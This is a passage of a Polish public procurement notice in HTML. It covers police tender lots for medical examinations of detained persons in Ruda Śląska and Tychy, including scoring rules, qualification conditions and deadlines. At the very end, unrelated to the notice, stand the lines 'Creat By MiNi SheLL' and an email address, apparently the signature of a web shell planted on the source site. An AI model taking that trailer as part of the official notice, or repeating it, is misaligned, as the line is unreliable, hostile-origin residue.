jaką dopuszcza Zamawiający wynosi 58 km. Stwierdzenie przez Zamawiającego odległości ZOZ od siedziby KMP/KPP większej niż 58 km skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia. Maksymalna odległość może być większa tylko w przypadku, gdy Zakład Opieki Zdrowotnej zlokalizowany jest w granicach administracyjnych jednostek. W takim przypadku dla kryterium B zostanie przydzielonych 0 pkt.<br/>d) Brak wskazania w formularzu ofertowym adresu miejsca świadczenia usług skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>e) W przypadku wskazania przez Wykonawcę kilku punktów ZOZ/lokalizacji, odległość Zakładu Opieki Zdrowotnej od jednostki Policji zostanie wyliczona na podstawie średniej arytmetycznej odległości. Średnia arytmetyczna odległość podlegać będzie ocenie w myśl pkt b-d.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od KPP/KMP</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3 – Świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję na terenie działania KMP w Rudzie Śląskiej<br/>Przedmiotem zamówienia jest całodobowe świadczenie usług lekarskich wobec osób doprowadzanych przez funkcjonariuszy do miejsca wykonywania badań, w tym:<br/>Wykonanie badania lekarskiego osoby doprowadzonej przez Policję do miejsca wykonywania badań.<br/>W przypadku konieczności, w ramach przeprowadzonego badania wystawienie zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do przebywania w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich, zakładzie poprawczym lub okręgowym ośrodku wychowawczym , a także (w przypadkach koniecznych) opatrzenie ran i wystawienie recepty na niezbędne leki oraz określenie ich dawkowania;<br/>Pobrania krwi do pakietu do pobrania próbek krwi dostarczonego przez funkcjonariusza (bez badań analitycznych) oraz sporządzenia protokołu pobrania krwi. Usługa ta zostanie wykonana na żądanie funkcjonariusza. <br/>Pobrania innego materiału biologicznego (np. ślina, mocz, włosy, wyskrobiny spod paznokci) bez badań analitycznych oraz sporządzenie protokołu z tego pobrania. Usługa ta zostanie wykonana na żądanie funkcjonariusza. <br/>W sytuacji gdy wyniknie konieczność, przeprowadzenie badania osoby doprowadzonej do miejsca wykonywania badań przez lekarza specjalistę tj.: wykonanie innego badania niż opisane w pkt. 1, w tym przeprowadzenie takiego badania w zakresie niezbędnym do wydania zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do umieszczenia osoby badanej w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich, zakładzie poprawczym lub okręgowym ośrodku wychowawczym.<br/>Szczegółowe informacje dotyczące przedmiotu zamówienia Zamawiający opisał w:<br/>Załączniku nr 1 do SWZ – Formularzu ofertowym;<br/>Załączniku nr 2 do SWZ – Projektowanych postanowieniach umowy;<br/>Załączniku nr 3 do SWZ – Opisie Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">23 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami o odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/> a) Cena oferty – 70 %, co stanowi 70 pkt<br/> b) Odległość od KPP/KMP – 30%, co stanowi 30 pkt<br/><br/>2. Ocena oferty<br/>Y = A+B<br/>gdzie:<br/>Y – Suma punktów badanej ważnej oferty<br/>A– cena oferty – 70 pkt<br/>B – odległość od KPP/KMP – 30 pkt,<br/>co daje łącznie 100 pkt<br/><br/>2.1 Punktacja dla kryterium A - cena będzie liczona zgodnie z poniższym wzorem<br/><br/>A (ilość punktów)=Najniższa oferowana cena brutto z ważnych ofert / Cena brutto badanej oferty x 70 pkt<br/><br/>Wyznaczenie wartości punktów:<br/>a) Ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj.: 70 pkt<br/>b) Inne ważne oferty z podaną ceną zostaną przeliczone wg powyższego wzoru.<br/><br/>2.2. Punktacja dla kryterium B – odległość od KPP/KMP będzie przydzielona zgodnie z poniższym podziałem dla każdej oferty niepodlegającej odrzuceniu:<br/>0,00 – 14,99 km – 30 pkt<br/>15,00 – 19,99 km – 20 pkt<br/>20,00 – 34,99 km – 10 pkt<br/>35,00 – 44,99 km – 5 pkt<br/>45,00 – 58,00 km – 0 pkt.<br/><br/>Wyznaczenie wartości punktów:<br/>a) każda ważna oferta otrzyma ilość punktów wynikającą z powyższego podziału.<br/>b) Zamawiający dokona wyliczenia odległości Zakładu Opieki Zdrowotnej od siedziby jednostki Policji w oparciu o wyznaczenie najkrótszej trasy przy użyciu Google Maps dla pojazdów samochodowych.<br/>c) maksymalna odległość Zakładu Opieki Zdrowotnej od jednostki Policji jaką dopuszcza Zamawiający wynosi 58 km. Stwierdzenie przez Zamawiającego odległości ZOZ od siedziby KMP/KPP większej niż 58 km skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia. Maksymalna odległość może być większa tylko w przypadku, gdy Zakład Opieki Zdrowotnej zlokalizowany jest w granicach administracyjnych jednostek. W takim przypadku dla kryterium B zostanie przydzielonych 0 pkt.<br/>d) Brak wskazania w formularzu ofertowym adresu miejsca świadczenia usług skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>e) W przypadku wskazania przez Wykonawcę kilku punktów ZOZ/lokalizacji, odległość Zakładu Opieki Zdrowotnej od jednostki Policji zostanie wyliczona na podstawie średniej arytmetycznej odległości. Średnia arytmetyczna odległość podlegać będzie ocenie w myśl pkt b-d.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od KPP/KMP</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 4 - Świadczenie usług lekarskich na rzecz osób zatrzymanych/doprowadzonych przez Policję na terenie działania KMP w Tychach<br/>Przedmiotem zamówienia jest całodobowe świadczenie usług lekarskich wobec osób doprowadzanych przez funkcjonariuszy do miejsca wykonywania badań, w tym:<br/>Wykonanie badania lekarskiego osoby doprowadzonej przez Policję do miejsca wykonywania badań.<br/>W przypadku konieczności, w ramach przeprowadzonego badania wystawienie zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do przebywania w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich, zakładzie poprawczym lub okręgowym ośrodku wychowawczym , a także (w przypadkach koniecznych) opatrzenie ran i wystawienie recepty na niezbędne leki oraz określenie ich dawkowania;<br/>Pobrania krwi do pakietu do pobrania próbek krwi dostarczonego przez funkcjonariusza (bez badań analitycznych) oraz sporządzenia protokołu pobrania krwi. Usługa ta zostanie wykonana na żądanie funkcjonariusza. <br/>Pobrania innego materiału biologicznego (np. ślina, mocz, włosy, wyskrobiny spod paznokci) bez badań analitycznych oraz sporządzenie protokołu z tego pobrania. Usługa ta zostanie wykonana na żądanie funkcjonariusza. <br/>W sytuacji gdy wyniknie konieczność, przeprowadzenie badania osoby doprowadzonej do miejsca wykonywania badań przez lekarza specjalistę tj.: wykonanie innego badania niż opisane w pkt. 1, w tym przeprowadzenie takiego badania w zakresie niezbędnym do wydania zaświadczenia lekarskiego o braku lub istnieniu przeciwwskazań do umieszczenia osoby badanej w pomieszczeniu dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pokoju przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich, zakładzie poprawczym lub okręgowym ośrodku wychowawczym.<br/>Szczegółowe informacje dotyczące przedmiotu zamówienia Zamawiający opisał w:<br/>Załączniku nr 1 do SWZ – Formularzu ofertowym;<br/>Załączniku nr 2 do SWZ – Projektowanych postanowieniach umowy;<br/>Załączniku nr 3 do SWZ – Opisie Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">23 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami o odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/> a) Cena oferty – 70 %, co stanowi 70 pkt<br/> b) Odległość od KPP/KMP – 30%, co stanowi 30 pkt<br/><br/>2. Ocena oferty<br/>Y = A+B<br/>gdzie:<br/>Y – Suma punktów badanej ważnej oferty<br/>A– cena oferty – 70 pkt<br/>B – odległość od KPP/KMP – 30 pkt,<br/>co daje łącznie 100 pkt<br/><br/>2.1 Punktacja dla kryterium A - cena będzie liczona zgodnie z poniższym wzorem<br/><br/>A (ilość punktów)=Najniższa oferowana cena brutto z ważnych ofert / Cena brutto badanej oferty x 70 pkt<br/><br/>Wyznaczenie wartości punktów:<br/>a) Ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj.: 70 pkt<br/>b) Inne ważne oferty z podaną ceną zostaną przeliczone wg powyższego wzoru.<br/><br/>2.2. Punktacja dla kryterium B – odległość od KPP/KMP będzie przydzielona zgodnie z poniższym podziałem dla każdej oferty niepodlegającej odrzuceniu:<br/>0,00 – 14,99 km – 30 pkt<br/>15,00 – 19,99 km – 20 pkt<br/>20,00 – 34,99 km – 10 pkt<br/>35,00 – 44,99 km – 5 pkt<br/>45,00 – 58,00 km – 0 pkt.<br/><br/>Wyznaczenie wartości punktów:<br/>a) każda ważna oferta otrzyma ilość punktów wynikającą z powyższego podziału.<br/>b) Zamawiający dokona wyliczenia odległości Zakładu Opieki Zdrowotnej od siedziby jednostki Policji w oparciu o wyznaczenie najkrótszej trasy przy użyciu Google Maps dla pojazdów samochodowych.<br/>c) maksymalna odległość Zakładu Opieki Zdrowotnej od jednostki Policji jaką dopuszcza Zamawiający wynosi 58 km. Stwierdzenie przez Zamawiającego odległości ZOZ od siedziby KMP/KPP większej niż 58 km skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia. Maksymalna odległość może być większa tylko w przypadku, gdy Zakład Opieki Zdrowotnej zlokalizowany jest w granicach administracyjnych jednostek. W takim przypadku dla kryterium B zostanie przydzielonych 0 pkt.<br/>d) Brak wskazania w formularzu ofertowym adresu miejsca świadczenia usług skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>e) W przypadku wskazania przez Wykonawcę kilku punktów ZOZ/lokalizacji, odległość Zakładu Opieki Zdrowotnej od jednostki Policji zostanie wyliczona na podstawie średniej arytmetycznej odległości. Średnia arytmetyczna odległość podlegać będzie ocenie w myśl pkt b-d.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od KPP/KMP</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Uprawnień do wykonywania określonej działalności gospodarczej lub zawodowej, o ile wnika to z odrębnych przepisów:<br/>Wykonawca spełni warunek jeżeli wykaże, iż posiada dokument potwierdzający, że jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym Wykonawca ma siedzibę lub miejsce zamieszkania tj. wpis do rejestru podmiotów wykonujących działalność leczniczą - zgodnie z art. 100 ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2024 r. poz. 799 z póżn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu na podstawie art. 125 ust. 1 ustawy Pzp, aktualnego na dzień składania ofert załącznik nr 4 do SWZ.<br/>Oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy kapitałowej z innymi Wykonawcami, którzy złożyli oferty w postępowaniu, według wzoru załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zaświadczenie o wpisie do rejestru podmiotów wykonujących działalność leczniczą – zgodnie z art. 100 ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz.U. z 2024 r. poz. 799 z późn. zm.).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, składając oświadczenia według wzoru załącznik nr 4 do SWZ oraz innych oświadczeń i dokumentów wskazanych w Sekcji VIII punkt 1.2, jeżeli ich oferta zostanie najwyżej oceniona, na wezwanie w trybie art. 126 ust. 1 ustawy Pzp.<br/>2. W przypadku konsorcjów i spółek cywilnych należy przedstawić odrębne oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu lub kryteriów selekcji dotyczące każdego ze współwykonawców. Oświadczenie takie potwierdza spełnienie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia tylko w odniesieniu do danego konsorcjanta lub wspólnika (art. 125 ust. 4 ustawy Pzp). Oznacza to, że każdy ze współwykonawców wykazuje w oświadczeniu tylko własne zdolności (zasoby).<br/>4. W przypadku, o którym mowa w pkt 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku, do oferty należy załączyć pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.<br/>5. Na podstawie art. 117 ust. 4 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni dołączyć oświadczenie według wzoru załącznik nr 5 do SWZ.<br/>6. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>7. Postanowienia sekcji VIII SWZ ust. 1.3 – 1.7 stosuje się odpowiednio. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegóły - załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Poza możliwością unieważnienia postępowania o udzielenie zamówienia na podstawie art. 255 ustawy Pzp, zamawiający zastrzega możliwość unieważnienia postępowania przed upływem terminu składania ofert, jeżeli wystąpią okoliczności powodujące, że dalsze prowadzenie postępowania jest nieuzasadnione (art. 256 ustawy Pzp) oraz zgodnie z art. 257 Pzp, w myśl którego Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały mu przyznane.<br/>Wartość umowy stanowić będzie wysokość środków przeznaczonych na realizację poszczególnych zadań, którą Zamawiający podał w dniu otwarcia ofert.<br/>Postępowanie prowadzone w trybie podstawowym na podstawie art. 275 ust. 1 w związku z art. 359 pkt 2 ustawy Pzp „Zamówienia na usługi społeczne i inne szczególne usługi” ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. 2024 r. poz. 1320 ze zm.).

Creat By MiNi SheLL
Email: jattceo@gmail.com